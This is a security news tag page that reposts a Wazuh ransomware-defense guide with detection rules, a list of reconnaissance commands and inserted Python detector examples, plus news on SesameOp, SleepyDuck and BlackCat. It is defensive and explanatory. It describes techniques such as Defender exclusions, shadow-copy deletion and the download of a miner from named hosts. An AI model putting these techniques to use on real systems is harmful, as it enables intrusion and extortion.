Tag: Cyber Security

  • Ransomware Defense Using the Wazuh Open Source Platform

    Ransomware is malicious software designed to block access to a computer system or encrypt data until a ransom is paid. This cyberattack is one of the most prevalent and damaging threats in the digital landscape, affecting individuals, businesses, and critical infrastructure worldwide.

    A ransomware attack typically begins when the malware infiltrates a system through various vectors such as phishing emails, malicious downloads, or exploiting software vulnerabilities. Once activated, the malware encrypts files using strong cryptographic algorithms, rendering them inaccessible to the legitimate owner. The attackers then demand payment, usually in cryptocurrency like Bitcoin, in exchange for the decryption key.

    Modern ransomware variants have evolved beyond simple file encryption. Some employ double extortion tactics, where attackers encrypt data, exfiltrate sensitive information, and threaten to publish it publicly if the ransom is not paid. This puts pressure on victims, particularly organizations handling confidential customer data or proprietary business information.

    Ransomware development and propagation

    Understanding ransomware creation and distribution is essential for developing effective defense strategies. The ransomware lifecycle involves sophisticated development processes and diverse propagation methods that exploit technical vulnerabilities and human behavior.

    Ransomware development

    Ransomware is typically developed by cybercriminal organizations or individual threat actors with programming expertise. The creation process involves:

    • Malware coding: Developers write malicious code using various programming languages, incorporating encryption algorithms and command-and-control communication protocols.
    • Ransomware-as-a-Service (RaaS): Some criminal groups operate subscription-based models that provide ransomware tools to affiliates in exchange for a percentage of ransom payments.
    • Customization and testing: Attackers test their malware against security solutions to ensure it can evade detection.

    Propagation methods

    Ransomware spreads through multiple attack vectors:

    • Phishing emails: Malicious attachments or links that appear legitimate trick users into downloading ransomware.
    • Exploit kits: Automated tools that scan for and exploit known vulnerabilities in applications and operating systems.
    • Remote Desktop Protocol (RDP) attacks: Attackers gain unauthorized access through weak or compromised RDP credentials.
    • Malicious websites and downloads: Downloads from compromised or malicious websites install ransomware with or without the user’s knowledge.
    • Supply chain attacks: Compromised trusted software or service providers can distribute ransomware to customers.
    • Removable media: Infected USB drives and external storage devices can spread ransomware when connected to computer systems.

    Effects of a ransomware attack

    The impact of ransomware extends far beyond the immediate encryption of files. Organizations and individuals affected by ransomware experience multiple consequences that can have long-lasting repercussions on operations, finances, and reputation.

    Financial consequences

    Ransomware attacks inflict financial damage beyond file encryption. Victims may face ransom demands ranging from hundreds to millions of dollars, with no guarantee of data recovery even after payment. Additional expenses arise from incident response, forensic investigations, system restoration, and security enhancements, while regulatory non-compliance can lead to substantial legal fines and penalties for data breaches.

    Operational consequences

    Ransomware attacks cause significant operational disruption by crippling access to vital resources. Critical business data, customer information, and intellectual property may be lost or compromised, while essential services become unavailable, impacting customers, partners, and internal workflows. The resulting operational downtime often surpasses the ransom cost, as businesses can experience weeks or months of halted operations.

    Reputational damage

    Ransomware incidents often lead to lasting reputational damage as data breaches erode customer trust and confidence in an organization’s ability to safeguard sensitive information. Public disclosure of such attacks can weaken market position, strain business relationships, and create a competitive disadvantage.

    Preventing ransomware attacks

    Preventing ransomware attacks requires a multi-layered defense strategy that combines technical controls, organizational policies, and user awareness. Understanding and implementing these protective measures reduces the risk of successful ransomware infections.

    Technical defenses

    • Security Information and Event Management (SIEM) and Extended Detection and Response (XDR): Implement continuous monitoring to detect and respond to suspicious activities and anomalous behavior.
    • File integrity monitoring: Track changes to files, folders, and system configurations. This helps you identify malware behavior within your environment.
    • Network traffic analysis: Monitor for unusual data exfiltration patterns or command-and-control communications.
    • Regular backups: To ensure recovery without ransom, maintain frequent, automated backups of critical data stored offline or in immutable storage.
    • Patch management: Keep operating systems, applications, and firmware up to date to remediate known vulnerabilities that ransomware exploits.
    • Network segmentation: Isolate critical systems and limit lateral movement opportunities for attackers.
    • Email filtering: Implement robust email security solutions to block phishing attempts and malicious attachments.
    • Access controls: Enforce the principle of least privilege and implement strong authentication mechanisms, including multi-factor authentication.
    • Application whitelisting: Allow only approved applications to execute in your environment, preventing unauthorized malware from running.

    Organizational practices

    • Security awareness training: Educate employees about phishing tactics, social engineering, and safe computing practices.
    • Incident response planning: Develop and regularly test comprehensive incident response procedures for ransomware scenarios.
    • Security audits: Conduct regular vulnerability assessments and penetration testing to identify security weaknesses.
    • Vendor risk management: Assess and monitor the security posture of third-party service providers.

    What Wazuh offers for ransomware protection

    Wazuh is a free and open source security platform that provides comprehensive capabilities for detecting, preventing, and responding to ransomware threats. It is a unified XDR (Extended Detection and Response) and SIEM (Security Information and Event Management) platform. Wazuh helps organizations build resilience against ransomware attacks through its out-of-the-box capabilities and integration with other security platforms.

    Threat detection and prevention

    Wazuh employs multiple detection mechanisms to identify ransomware activities. These include:

    • Malware detection: Wazuh integrates with threat intelligence feeds and utilizes signature-based and anomaly-based detection methods to identify known ransomware variants.
    • Vulnerability detection: This Wazuh capability scans systems for known vulnerabilities that ransomware commonly exploits, enabling proactive patching and reducing the likelihood of successful compromise.
    • Log data analysis: This Wazuh capability analyzes security events collected from user endpoints, servers, cloud workloads, and network devices to detect ransomware indicators.
    • Security configuration monitoring (SCA): The Wazuh SCA evaluates system configurations against security best practices and compliance frameworks.
    • File integrity monitoring (FIM): This Wazuh capability monitors critical files and directories, detecting unauthorized modifications that may indicate ransomware encryption activity.
    • Regulatory compliance monitoring: This Wazuh capability helps organizations maintain security standards and regulatory compliance requirements that deter ransomware attacks.

    Incident response capabilities

    • Active response: The Wazuh Active Response capability automatically executes predefined actions when threats are detected, such as isolating infected systems, blocking malicious processes, or quarantining files.
    • Integration with external solutions: Wazuh integrates with other security tools and platforms to improve organizations’ security posture.

    Use cases

    The following sections show some use cases of Wazuh detection and response to ransomware.

    Detecting and responding to DOGE Big Balls ransomware with Wazuh

    The DOGE Big Balls ransomware, a modified version of the FOG ransomware, combines technical exploits with psychological manipulation targeting enterprise environments. This malware variant delivers its payload through phishing campaigns or unpatched vulnerabilities. It then performs privilege escalation, reconnaissance, file encryption, and note creation on the victim’s endpoint.

    Detection

    Wazuh detects the DOGE Big Balls ransomware using threat detection rules and a Wazuh CDB (constant database) list to match its specific pattern.

    • CDB list containing DOGE Big Balls reconnaissance commands:
    net  config Workstation:
    systeminfo:
    hostname:
    net  users:
    ipconfig  /all:
    route  print:
    arp  -A:
    netstat  -ano:
    netsh firewall show state:
    netsh firewall show config:
    schtasks  /query /fo LIST /v:
    tasklist  /SVC:
    net  start:
    DRIVERQUERY:

    <group name="doge_big_ball,ransomware,">

      <rule id="100020" level="10">
        <if_sid>61613</if_sid>
        <field name="win.eventdata.image" type="pcre2">(?i)[C-Z]:.*\\.*.exe</field>
        <field name="win.eventdata.targetFilename" type="pcre2">(?i)[C-Z]:.*.\\DbgLog.sys</field>
        <description>A log file $(win.eventdata.targetFilename) was created to log the output of the reconnaissance activities of the DOGE Big Balls ransomware. Suspicious activity detected.</description>
        <mitre>
          <id>T1486</id>
        </mitre>
      </rule>

      <rule id="100021" level="8" timeframe="300" frequency="2">
        <if_sid>61603</if_sid>
        <list field="win.eventdata.commandLine" lookup="match_key">etc/lists/doge-big-balls-ransomware</list>
        <description>The command $(win.eventdata.commandLine) is executed for reconnaissance activities. Suspicious activity detected.</description>
        <options>no_full_log</options>
      </rule>

      <!-- Ransom note file creation -->
      <rule id="100022" level="15" timeframe="300" frequency="2">
        <if_sid>61613</if_sid>
        <field name="win.eventdata.image" type="pcre2">(?i)[C-Z]:.*\\.*.exe</field>
        <field name="win.eventdata.targetFilename" type="pcre2">(?i)[C-Z]:.*.\\readme.txt</field>
        <description>DOGE Big Balls ransom note $(win.eventdata.targetFilename) has been created in multiple directories. Possible DOGE Big Balls ransomware detected.</description>
        <mitre>
          <id>T1486</id>
        </mitre>
      </rule>

      <rule id="100023" level="15" timeframe="300" frequency="2" ignore="100">
        <if_matched_sid>100020</if_matched_sid>
        <if_sid>100021</if_sid>
        <description>Possible DOGE Big Balls ransomware detected.</description>
        <mitre>
          <id>T1486</id>
        </mitre>
      </rule>

    </group>


    These rules flag the execution of known reconnaissance commands and detect when multiple ransom notes appear across directories. These are DOGE Big Balls ransomware IOCs that indicate file encryption and other ransomware activities.
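    To make the chaining of these four rules concrete, here is an added Python model (example code, not Wazuh's engine and not the article's own code) that replays constructed Sysmon-style events through the same pcre2 patterns, the CDB keys, the frequency/timeframe windows, and the if_matched_sid and ignore handling of rule 100023. It assumes parent rule 61613 is a Sysmon file-create event and 61603 a process-create event, and approximates lookup="match_key" as a substring check of each list key against the command line.

```python
import re
from collections import defaultdict

# CDB list exactly as given in the article: "key:value" lines with an empty
# value. The double spaces are part of the keys and are kept as written.
CDB_LIST = """\
net  config Workstation:
systeminfo:
hostname:
net  users:
ipconfig  /all:
route  print:
arp  -A:
netstat  -ano:
netsh firewall show state:
netsh firewall show config:
schtasks  /query /fo LIST /v:
tasklist  /SVC:
net  start:
DRIVERQUERY:
"""

def load_cdb_keys(text):
    """Return the key part of every non-empty 'key:value' line."""
    return [line.split(":", 1)[0] for line in text.splitlines() if line.strip()]

# The pcre2 patterns from rules 100020 and 100022, used unchanged.
EXE_RE = re.compile(r"(?i)[C-Z]:.*\\.*.exe")
DBGLOG_RE = re.compile(r"(?i)[C-Z]:.*.\\DbgLog.sys")
README_RE = re.compile(r"(?i)[C-Z]:.*.\\readme.txt")
SID_FILE_CREATE = 61613  # assumption: Sysmon event 11 (file created)
SID_PROC_CREATE = 61603  # assumption: Sysmon event 1 (process created)

class DogeDetector:
    """Simplified evaluator for rules 100020-100023 over decoded events."""

    def __init__(self, cdb_keys, timeframe=300, frequency=2, ignore=100):
        self.keys = cdb_keys
        self.timeframe, self.frequency, self.ignore = timeframe, frequency, ignore
        self.matches = defaultdict(list)  # rule id -> timestamps of its matches
        self.last_final = None            # last 100023 alert, for ignore="100"
        self.alerts = []                  # (timestamp, rule id, level)

    def _count(self, rule_id, ts, record=True):
        """Optionally record a match, then count matches inside the timeframe."""
        if record:
            self.matches[rule_id].append(ts)
        self.matches[rule_id] = [t for t in self.matches[rule_id] if ts - t <= self.timeframe]
        return len(self.matches[rule_id])

    def feed(self, event):
        ts, sid, d = event["ts"], event["sid"], event["data"]
        if sid == SID_FILE_CREATE:
            image, target = d.get("image", ""), d.get("targetFilename", "")
            if EXE_RE.search(image) and DBGLOG_RE.search(target):
                self._count(100020, ts)  # rule 100020: DbgLog.sys created
                self.alerts.append((ts, 100020, 10))
            elif EXE_RE.search(image) and README_RE.search(target):
                # rule 100022: second ransom note inside timeframe="300"
                if self._count(100022, ts) >= self.frequency:
                    self.alerts.append((ts, 100022, 15))
        elif sid == SID_PROC_CREATE:
            cmd = d.get("commandLine", "")
            # lookup="match_key" approximated as "command line contains a key"
            if any(key in cmd for key in self.keys):
                if self._count(100021, ts) >= self.frequency:  # rule 100021
                    self.alerts.append((ts, 100021, 8))
                    # rule 100023: 100021 fired and 100020 matched inside the
                    # timeframe; ignore="100" suppresses repeats for 100 s
                    quiet = self.last_final is not None and ts - self.last_final <= self.ignore
                    if self._count(100020, ts, record=False) and not quiet:
                        self.alerts.append((ts, 100023, 15))
                        self.last_final = ts
        return self.alerts

def replay(events, cdb_text=CDB_LIST):
    """Feed events in time order; return the rule ids that alerted, in order."""
    det = DogeDetector(load_cdb_keys(cdb_text))
    for ev in sorted(events, key=lambda e: e["ts"]):
        det.feed(ev)
    return [rule_id for _, rule_id, _ in det.alerts]

# Constructed sample stream (not from a real incident), already decoded into
# the win.eventdata fields the rules reference. Paths are made up.
EXE = "C:\\Users\\Public\\recon.exe"

def fc(ts, target):  # constructed Sysmon file-create event written by EXE
    return {"ts": ts, "sid": SID_FILE_CREATE, "data": {"image": EXE, "targetFilename": target}}

def pc(ts, cmd):  # constructed Sysmon process-create event
    return {"ts": ts, "sid": SID_PROC_CREATE, "data": {"commandLine": cmd}}

SAMPLE_EVENTS = [
    fc(0, "C:\\Users\\Public\\DbgLog.sys"),
    pc(5, 'cmd.exe /c "net  config Workstation"'),
    pc(9, 'cmd.exe /c "systeminfo"'),
    pc(12, "notepad.exe C:\\a.txt"),  # benign: no list key in the command line
    fc(40, "C:\\Users\\alice\\Documents\\readme.txt"),
    fc(41, "C:\\Users\\alice\\Pictures\\readme.txt"),
]

if __name__ == "__main__":
    print(replay(SAMPLE_EVENTS))  # [100020, 100021, 100023, 100022]
```

    Without the DbgLog.sys creation at the start of the stream, the reconnaissance commands still raise 100021 but 100023 stays silent, which is the point of the if_matched_sid dependency.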

    Automated response

    Wazuh enables ransomware detection and removal using its File Integrity Monitoring (FIM) capability and integration with YARA. In this use case, Wazuh monitors the Downloads directory in real-time. When a new or modified file appears, it triggers the active response capability to execute a YARA scan. If a file matches known YARA ransomware signatures like DOGE Big Balls, the custom active response script deletes it automatically and logs the action. Custom decoders and rules on the Wazuh server parse those logs to generate alerts showing whether the file was detected and successfully removed.

    Detecting Gunra ransomware with Wazuh

    The Gunra ransomware is typically used by private cybercriminals to extort money from its victims. It utilizes a double-extortion model that encrypts files and exfiltrates data for publication should its victim fail to pay the ransom. The Gunra ransomware spreads through Windows systems by encrypting files, appending the .ENCRT extension, and leaving ransom notes named R3ADM3.txt. It deletes shadow copies, disables backup and antivirus services to block recovery, and uses Tor networks to hide its operators. These actions make data restoration difficult and help the attackers maintain anonymity during ransom negotiations.

    Detection

    The following Wazuh rules alert when ransom notes named R3ADM3.txt appear, system components like VSS or amsi.dll are tampered with, or suspicious modules such as urlmon.dll are loaded for network activity. The rules also track attempts to delete shadow copies or disable backup and admin functions, indicating behavior typical of ransomware preparing for file encryption.

    <group name="gunra,ransomware,">
    
      <!--Ransom note file creation-->
      <rule frequency="2" id="100601" ignore="100" level="15" timeframe="100">
        <if_sid>61613</if_sid>
        <field name="win.eventdata.Image" type="pcre2">[^"]+.exe</field>
        <field name="win.eventdata.targetFilename" type="pcre2">[^"]*R3ADM3.txt</field>
        <description>Possible Gunra ransomware activity detected: Multiple ransom notes dropped in $(win.eventdata.targetFilename)</description>
        <mitre>
          <id>T1543.003</id>
          <id>T1486</id> 
        </mitre>
      </rule>
    
      <!--Antimalware Scan Interface Access Modification-->
      <rule id="100602" level="7">
        <if_sid>61609</if_sid>
        <field name="win.eventdata.Image" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
        <field name="win.eventdata.ImageLoaded" type="pcre2">C:\\Windows\\System32\\amsi.dll</field>
        <description>Possible ransomware activity detected: Suspicious Volume Shadow copy Service (VSS) loaded amsi.dll for tampering and evasion attempt.</description>
        <mitre>
          <id>T1562</id>
          <id>T1562.001</id>
        </mitre>
      </rule>
    
      <rule id="100603" level="7">
        <if_sid>61609</if_sid>
        <field name="win.eventdata.Image" type="pcre2">(C:\\Windows\\SystemApps\\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\\CHXSmartScreen.exe)</field>
        <field name="win.eventdata.ImageLoaded" type="pcre2">C:\\Windows\\System32\\urlmon.dll</field>
        <description>Possible ransomware activity detected: Urlmon.dll was loaded, indicating network reconnaissance.</description>
        <mitre>
          <id>T1562.001</id>
        </mitre>
      </rule>
    
      <!--Volume Shadow copy Service (VSS) deletion-->
      <rule id="100604" level="7">
        <if_sid>60103</if_sid>
        <field name="win.eventdata.targetUserName" type="pcre2">Backup Operators</field>
        <field name="win.eventdata.targetSid" type="pcre2">S-1-5-32-551</field>
        <field name="win.eventdata.callerProcessName" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
        <description>Possible Gunra ransomware activity detected: Volume Shadow copy Service (VSS) deletion attempts, gearing up to disable backups.</description>
        <mitre>
          <id>T1562</id>
          <id>T1562.002</id>
        </mitre>
      </rule>
    
      <rule id="100605" level="7">
        <if_sid>60103</if_sid>
        <field name="win.eventdata.targetUserName" type="pcre2">Administrators</field>
        <field name="win.eventdata.targetSid" type="pcre2">S-1-5-32-544</field>
        <field name="win.eventdata.callerProcessName" type="pcre2">C:\\Windows\\System32\\VSSVC.exe</field>
        <description>Possible Gunra ransomware activity detected: Volume Shadow copy Service (VSS) deletion shadow attempts, gearing to disable local admin accounts</description>
        <mitre>
          <id>T1562</id>
          <id>T1562.002</id>
        </mitre>
      </rule>
    
    </group>
    

    Automated response

    Wazuh automates the response to Gunra ransomware file activity using its FIM capability and integration with VirusTotal. In this use case, the Wazuh File Integrity Monitoring (FIM) module monitors the Downloads folder in real time, triggering scans whenever files are added or changed. A custom active response executable then securely deletes any file that VirusTotal flags as a threat.

    Ransomware protection on Windows with Wazuh

    Wazuh provides ransomware protection and file recovery on monitored Windows endpoints using its command module and the Windows Volume Shadow Copy Service (VSS). This integration allows administrators to automatically take snapshots of monitored endpoints and restore files to their state before malware encrypted them.

    The following image shows successful Wazuh Active Response file recovery alerts.

    Conclusion

    Ransomware attacks cause significant financial, operational, and reputational damage. They require multi-layered defenses that combine early detection with incident response. Organizations that invest in these practices are better equipped to withstand and recover from such attacks.

    Wazuh provides capabilities that enable early detection and rapid response to contain ransomware attacks. It offers out-of-the-box capabilities for vulnerability detection, file integrity monitoring, log data analysis, and automated responses to prevent ransomware-caused data loss and downtime.


    Source: thehackernews.com…

  • Google’s AI ‘Big Sleep’ Finds 5 New Vulnerabilities in Apple’s Safari WebKit

    Nov 04, 2025 – Ravie Lakshmanan – Artificial Intelligence / Vulnerability

    Google’s artificial intelligence (AI)-powered cybersecurity agent called Big Sleep has been credited by Apple for discovering as many as five different security flaws in the WebKit component used in its Safari web browser that, if successfully exploited, could result in a browser crash or memory corruption.

    The list of vulnerabilities is as follows –

    • CVE-2025-43429 – A buffer overflow vulnerability that may lead to an unexpected process crash when processing maliciously crafted web content (addressed through improved bounds checking)
    • CVE-2025-43430 – An unspecified vulnerability that could result in an unexpected process crash when processing maliciously crafted web content (addressed through improved state management)
    • CVE-2025-43431 & CVE-2025-43433 – Two unspecified vulnerabilities that may lead to memory corruption when processing maliciously crafted web content (addressed through improved memory handling)
    • CVE-2025-43434 – A use-after-free vulnerability that may lead to an unexpected Safari crash when processing maliciously crafted web content (addressed through improved state management)

    Patches for the shortcomings have been released by Apple on Monday as part of iOS 26.1, iPadOS 26.1, macOS Tahoe 26.1, tvOS 26.1, watchOS 26.1, visionOS 26.1, and Safari 26.1. The updates are available for the following devices and operating systems –

    • iOS 26.1 and iPadOS 26.1 – iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
    • macOS Tahoe 26.1 – Macs running macOS Tahoe
    • tvOS 26.1 – Apple TV 4K (2nd generation and later)
    • visionOS 26.1 – Apple Vision Pro (all models)
    • watchOS 26.1 – Apple Watch Series 6 and later
    • Safari 26.1 – Macs running macOS Sonoma and macOS Sequoia

    Big Sleep, formerly called Project Naptime, is an AI agent launched by Google last year as part of a collaboration between DeepMind and Google Project Zero to enable automated vulnerability discovery.

    Earlier this year, Google said the large language model (LLM)-assisted framework identified a security flaw in SQLite (CVE-2025-6965, CVSS score: 7.2) that it said was at “risk of being exploited” by malicious actors.

    While none of the vulnerabilities listed in Monday’s security bulletins have been flagged as exploited in the wild, it’s always a good practice to keep devices updated to the latest version for optimal protection.


    Source: thehackernews.com…

  • U.S. Prosecutors Indict Cybersecurity Insiders Accused of BlackCat Ransomware Attacks

    Nov 04, 2025 – Ravie Lakshmanan – Ransomware / Cybercrime

    Federal prosecutors in the U.S. have accused a trio of allegedly hacking the networks of five U.S. companies with BlackCat (aka ALPHV) ransomware between May and November 2023 and extorting them.

    Ryan Clifford Goldberg, Kevin Tyler Martin, and an unnamed co-conspirator (aka “Co-Conspirator 1”) based in Florida, all U.S. nationals, are said to have used the ransomware strain against a medical device company based in Tampa, Florida, a pharmaceutical company based in Maryland, a doctor’s office based in California, an engineering company based in California, and a drone manufacturer based in Virginia.

    The Chicago Sun-Times first reported the indictment over the weekend, stating Martin and Co-Conspirator 1 were employed as ransomware threat negotiators for a company named DigitalMint at the time when these incidents took place. Goldberg was an incident response manager for cybersecurity company Sygnia.

    All three individuals are no longer working at the respective firms, with both DigitalMint and Sygnia stating they have cooperated with law enforcement on the matter. In July 2025, Bloomberg reported that the U.S. Federal Bureau of Investigation (FBI) was looking into a former employee of DigitalMint for supposedly taking a cut from ransomware payments.

    According to the indictment document, Goldberg, Martin, and the co-conspirator have been accused of wilfully engaging in a conspiracy to “enrich” themselves by accessing victims’ networks or computers in an unauthorized manner, stealing their data, installing the BlackCat ransomware on their systems in exchange for a cryptocurrency payment, and dividing the illicit proceeds amongst them –

    • Around May 13, 2023, the defendants attacked the medical device firm and demanded an approximate $10,000,000 ransom payment. The company ended up paying virtual currency worth approximately $1,274,000 at the time of payment.
    • Around May 2023, the defendants attacked the firm and demanded an unspecified amount as ransom.
    • Around July 2023, the defendants attacked the doctor’s office and demanded an approximate $5,000,000 ransom payment.
    • Around October 2023, the defendants attacked the engineering company and demanded an approximate $1,000,000 ransom payment.
    • Around November 2023, the defendants attacked the drone manufacturer and demanded an approximate $300,000 ransom payment.

    It’s said that they did not manage to extort a financial payment from the other victims. While Martin has pleaded not guilty, court records show that Goldberg allegedly confessed to being recruited by the unnamed co-conspirator to “try and ransom some companies” during an interview with the FBI and that he conducted the attacks to get out of debt. The third individual has not been indicted.

    Both Goldberg and Martin have been charged with conspiracy to interfere with interstate commerce by extortion, interference with interstate commerce by extortion, and intentional damage to a protected computer. These charges carry a maximum penalty of up to 50 years in federal prison.


    Source: thehackernews.com…

  • Microsoft Detects "SesameOp" Backdoor Using OpenAI's API as a Stealth Command Channel

    Nov 04, 2025 – Ravie Lakshmanan – Artificial Intelligence / Malware

    Microsoft has disclosed details of a novel backdoor dubbed SesameOp that uses OpenAI Assistants Application Programming Interface (API) for command-and-control (C2) communications.

    “Instead of relying on more traditional methods, the threat actor behind this backdoor abuses OpenAI as a C2 channel as a way to stealthily communicate and orchestrate malicious activities within the compromised environment,” the Detection and Response Team (DART) at Microsoft Incident Response said in a technical report published Monday.

    “To do this, a component of the backdoor uses the OpenAI Assistants API as a storage or relay mechanism to fetch commands, which the malware then runs.”

    The tech giant said it discovered the implant in July 2025 as part of a sophisticated security incident in which unknown threat actors had managed to maintain persistence within the target environment for several months. It did not name the impacted victim.

    Further investigation into the intrusion activity has led to the discovery of what it described as a “complex arrangement” of internal web shells, which are designed to execute commands relayed from “persistent, strategically placed” malicious processes. These processes, in turn, leverage Microsoft Visual Studio utilities that were compromised with malicious libraries, an approach referred to as AppDomainManager injection.

    SesameOp is a custom backdoor engineered to maintain persistence and allow a threat actor to covertly manage compromised devices, indicating that the attack’s overarching goal was to ensure long-term access for espionage efforts.

    OpenAI Assistants API enables developers to integrate artificial intelligence (AI)-powered agents directly into their applications and workflows. The API is scheduled for deprecation by OpenAI in August 2026, with the company replacing it with a new Responses API.

    The infection chain, per Microsoft, includes a loader component (“Netapi64.dll”) and a .NET-based backdoor (“OpenAIAgent.Netapi64”) that leverages the OpenAI API as a C2 channel to fetch encrypted commands, which are subsequently decoded and executed locally. The results of the execution are sent back to OpenAI as a message.

    “The dynamic link library (DLL) is heavily obfuscated using Eazfuscator.NET and is designed for stealth, persistence, and secure communication using the OpenAI Assistants API,” the company said. “Netapi64.dll is loaded at runtime into the host executable via .NET AppDomainManager injection, as instructed by a crafted .config file accompanying the host executable.”

    The message supports three types of values in the description field of the Assistants list retrieved from OpenAI –

    • SLEEP, to allow the process thread to sleep for a specified duration
    • Payload, to extract the contents of the message from the instructions field and invoke it in a separate thread for execution
    • Result, to transmit the processed result to OpenAI as a new message in which the description field is set to “Result” to signal the threat actor that the output of the execution of the payload is available

    It’s currently not clear who is behind the malware, but the development signals continued abuse of legitimate tools for malicious purposes to blend in with normal network activity and sidestep detection. Microsoft said it shared its findings with OpenAI, which identified and disabled an API key and associated account believed to have been used by the adversary.


    Source: thehackernews.com…

  • Malicious VSX Extension "SleepyDuck" Uses Ethereum to Keep Its Command Server Alive

    Nov 03, 2025 – Ravie Lakshmanan – Cryptocurrency / Threat Intelligence

    Cybersecurity researchers have flagged a new malicious extension in the Open VSX registry that harbors a remote access trojan called SleepyDuck.

    According to Secure Annex’s John Tuckner, the extension in question, juan-bianco.solidity-vlang (version 0.0.7), was first published on October 31, 2025, as a completely benign library that was subsequently updated to version 0.0.8 on November 1 to include new malicious capabilities after reaching 14,000 downloads.

    “The malware includes sandbox evasion techniques and utilizes an Ethereum contract to update its command and control address in case the original address is taken down,” Tuckner added.

    Campaigns distributing rogue extensions targeting Solidity developers have been repeatedly detected across both the Visual Studio Extension Marketplace and Open VSX. In July 2025, Kaspersky disclosed that a Russian developer lost $500,000 in cryptocurrency assets after installing one such extension through Cursor.

    In the latest instance detected by the enterprise extension security firm, the malware is triggered when a new code editor window is opened or a .sol file is selected.

    Specifically, it’s configured to find the fastest Ethereum Remote Procedure Call (RPC) provider to connect to in order to obtain access to the blockchain, initialize contact with a remote server at “sleepyduck[.]xyz” (hence the name) via the contract address “0xDAfb81732db454DA238e9cFC9A9Fe5fb8e34c465,” and kick off a polling loop that checks for new commands to be executed on the host every 30 seconds.

    It’s also capable of gathering system information, such as hostname, username, MAC address, and timezone, and exfiltrating the details to the server. In the event the domain is seized or taken down, the malware has built-in fallback controls to reach out to a predefined list of Ethereum RPC addresses to extract the contract information that can hold the server details.

    What’s more, the extension is equipped to fetch a new configuration from the contract address to set a new server, as well as execute an emergency command on all endpoints in the event that something unexpected occurs. The contract was created on October 31, 2025, with the threat actor updating the server details from “localhost:8080” to “sleepyduck[.]xyz” over the course of four transactions.

    It’s not clear if the download counts were artificially inflated by the threat actors to boost the relevance of the extension in search results – a tactic often adopted to increase the popularity so as to trick unsuspecting developers into installing a malicious library.

    The development comes as the company also disclosed details of another set of five extensions, this time published to the VS Code Extension Marketplace by a user named “developmentinc,” including a Pokémon-themed library that downloads a batch script miner from an external server (“mock1[.]su:443”) as soon as it’s installed or enabled, and runs the miner using “cmd.exe.”

    The script file, besides relaunching itself with administrator privileges using PowerShell and configuring Microsoft Defender Antivirus exclusions by adding every drive letter from C: through Z:, downloads a Monero mining executable from “mock1[.]su” and runs it.
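    The mass Defender exclusion described above leaves a telemetry trail: each exclusion added to the Paths key is logged as a Microsoft-Windows-Windows Defender/Operational event ID 5007 (“configuration changed”). The following is an added detection example, not code from the article or from any vendor; the one-line event layout (timestamp, host, event ID, message), the host names and every sample event are constructed for the example.

```python
"""Detect a burst of whole-drive Microsoft Defender exclusions (C: through Z:)
in Defender 'configuration changed' events (Event ID 5007)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Registry value reported by a 5007 event when a path exclusion is added.
# Only whole-drive roots such as "C:\" are of interest; "D:\Backups" is not.
DRIVE_ROOT_EXCLUSION_RE = re.compile(
    r"New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\"
    r"([A-Za-z]):\\ = 0x0\s*$"
)
# Assumed (constructed) line layout: "<ISO timestamp> <host> <event id> <message>".
EVENT_RE = re.compile(r"^(\S+) (\S+) (\d+) (.*)$")


def _make_sample() -> list:
    """Constructed sample events (not real telemetry): one workstation that
    excludes every drive root in quick succession, plus benign noise."""
    base = datetime(2025, 11, 3, 10, 15, 0)
    msg = ("Windows Defender Antivirus Configuration has changed. Old value: "
           "New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\{} = 0x0")
    lines = []
    for i, letter in enumerate("CDEFGHIJKLMNOPQRSTUVWXYZ"):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} WS01 5007 " + msg.format(letter + ":\\"))
    # Benign: an admin excludes a single backup folder on another host.
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()} WS02 5007 " + msg.format("D:\\Backups"))
    # Benign: one lone drive-root exclusion, hours earlier, on a third host.
    lines.append(f"{(base - timedelta(hours=3)).isoformat()} WS03 5007 " + msg.format("C:\\"))
    # Unrelated 5007 event (real-time protection setting changed) on WS01.
    lines.append(f"{(base + timedelta(seconds=40)).isoformat()} WS01 5007 "
                 "Windows Defender Antivirus Configuration has changed. Old value: "
                 "New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1")
    return lines


SAMPLE_EVENTS = _make_sample()


def parse_drive_exclusion(line: str):
    """Return (timestamp, host, drive_letter) for a 5007 event that adds a
    whole-drive exclusion, or None for any other line."""
    m = EVENT_RE.match(line)
    if not m or m.group(3) != "5007":
        return None
    x = DRIVE_ROOT_EXCLUSION_RE.search(m.group(4))
    if not x:
        return None
    return datetime.fromisoformat(m.group(1)), m.group(2), x.group(1).upper()


def find_bulk_drive_exclusions(lines, threshold=3, window=timedelta(minutes=5)):
    """Flag hosts where at least `threshold` distinct drive roots were excluded
    inside one time window. Returns a list of findings sorted by host."""
    by_host = defaultdict(list)
    for line in lines:
        parsed = parse_drive_exclusion(line)
        if parsed:
            ts, host, drive = parsed
            by_host[host].append((ts, drive))
    findings = []
    for host, events in by_host.items():
        events.sort()
        best, best_span = set(), None
        for i, (start, _) in enumerate(events):
            in_window = [(ts, d) for ts, d in events[i:] if ts - start <= window]
            drives = {d for _, d in in_window}
            if len(drives) > len(best):
                best = drives
                best_span = (start, max(ts for ts, _ in in_window))
        if len(best) >= threshold:
            findings.append({
                "host": host,
                "drives": "".join(sorted(best)),
                "count": len(best),
                "first": best_span[0].isoformat(),
                "last": best_span[1].isoformat(),
            })
    return sorted(findings, key=lambda f: f["host"])


if __name__ == "__main__":
    for f in find_bulk_drive_exclusions(SAMPLE_EVENTS):
        print(f"[ALERT] {f['host']}: {f['count']} drive roots excluded "
              f"({f['drives']}) between {f['first']} and {f['last']}")
```

The single-folder exclusion on WS02 and the lone C: exclusion on WS03 stay below the threshold, so only WS01 is reported.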


    The extensions uploaded by the threat actor, now no longer available for download, are listed below –

    • developmentinc.cfx-lua-vs
    • developmentinc.pokemon
    • developmentinc.torizon-vs
    • developmentinc.minecraftsnippets
    • developmentinc.kombai-vs

